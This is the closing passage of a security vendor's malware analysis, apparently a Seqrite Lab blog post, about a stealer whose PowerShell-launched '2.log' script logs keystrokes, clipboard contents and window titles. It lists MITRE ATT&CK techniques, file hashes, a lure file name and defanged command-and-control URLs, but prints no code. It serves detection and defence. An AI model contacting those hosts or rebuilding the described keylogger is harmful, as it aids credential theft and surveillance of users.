The execution flow of the functions follows a sequence where several actions are carried out within the attack. Among these functions, one triggers another PowerShell command that calls the 2.log file, which is responsible for performing keylogging activities.

Fig. 27 Flow of execution of functions and command to execute “2.log”.

The decoded content of the 2.log file is shown above. It contains a script that imports essential Windows API functions for detecting key presses, retrieving window titles, and managing keyboard states. The script executes actions such as clipboard monitoring, keystroke logging, and recording window titles.

Fig. 30.2 Code for clipboard monitoring.

Conclusion

As observed, threat actors are utilizing time-consuming, multi-component techniques that are interlinked to enhance their evasiveness. Unlike other stealers, this one primarily focuses on network-related information, which could be leveraged for active reconnaissance. Given that the stealer targets sensitive user data, it is crucial to protect yourself with a reputable security solution such as Seqrite Antivirus in today’s digital landscape. At Seqrite Lab, we provide detection capabilities for such stealers at various stages of infection, along with protection against the latest threats.

Seqrite Protection:

Trojan.49424.SL
Trojan.49422.C

MITRE ATT&CK:

Initial Access	T1566.001	Phishing: Spearphishing Attachment
Execution	T1059.001 T1059.005	Command and Scripting Interpreter: PowerShell Command and Scripting Interpreter: Visual Basic
Persistence	T1547.001	Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion	T1140	Deobfuscate/Decode Files or Information
Credential Access	T1555.003	Credentials from Password Stores: Credentials from Web Browsers
Discovery	T1082	System Information Discovery
Collection	T1056.001	Input Capture: Keylogging
Command and Control	T1071.001	Application Layer Protocol: Web Protocols
Exfiltration	T1041	Exfiltration Over C2 Channel

IoCs:

MD5	File Name
1119A977A925CA17B554DCED2CBABD8	*.lnk
64677CAE14A2EC4D393A81548417B61B	1.log
F0F63808E17994E91FD397E3A54A80CB	2.log
A3353EA094F45915408065D03AE157C4	prevenue.hta
CE4549607E46E656D8E019624D5036C1	1.vbs
1B90EFF0B4F54DA72B19195489C3AF6C	*.lnk
1D64508B384E928046887DD9CB32C2AC	성범죄자 신상정보 고지.pdf.lnk

hxxps[:]//cdn[.]glitch[.]global/
hxxp[:]//srvdown[.]ddns.net

Authors

Dixit Panchal

Kartik Jivani

Soumen Burma

Source link

آوریل 24, 2025